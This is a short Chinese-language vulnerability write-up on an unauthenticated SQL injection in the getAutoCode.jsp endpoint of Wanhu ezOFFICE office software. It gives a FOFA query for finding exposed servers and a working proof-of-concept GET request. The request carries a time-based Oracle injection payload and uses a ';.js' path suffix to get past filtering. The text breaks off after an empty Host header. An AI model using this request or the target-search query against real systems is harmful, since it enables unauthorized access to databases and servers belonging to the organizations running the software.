0x01 产品简介
万户OA ezoffice是万户网络协同办公产品多年来不停将重要精力致力于中高端市场的一款OA协同办公软件产品,同一的基础管理平台,实现用户数据同一管理、权限同一分配、身份同一认证。同一规划流派网站群和协同办公平台,将外网信息维护、客户服务、互动交流和日常工作紧密结合起来,有效进步工作效率。
0x02 漏洞概述
万户 ezOFFICE getAutoCode.jsp 接口处存在SQL注入漏洞,未经身份验证的远程攻击者可使用此漏洞获取数据库权限,深入使用可获取服务器权限。
0x03 复现情况
FOFA:app="万户网络-ezOFFICE"
0x04 漏洞复现
PoC
- GET /defaultroot/platform/custom/customizecenter/js/getAutoCode.jsp;.js?pageId=1&head=2%27+AND+6205%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2898%29%7C%7CCHR%2866%29%7C%7CCHR%2890%29%7C%7CCHR%28108%29%2C8%29--+YJdO&field=field_name&tabName=tfield HTTP/1.1
- Host:
|
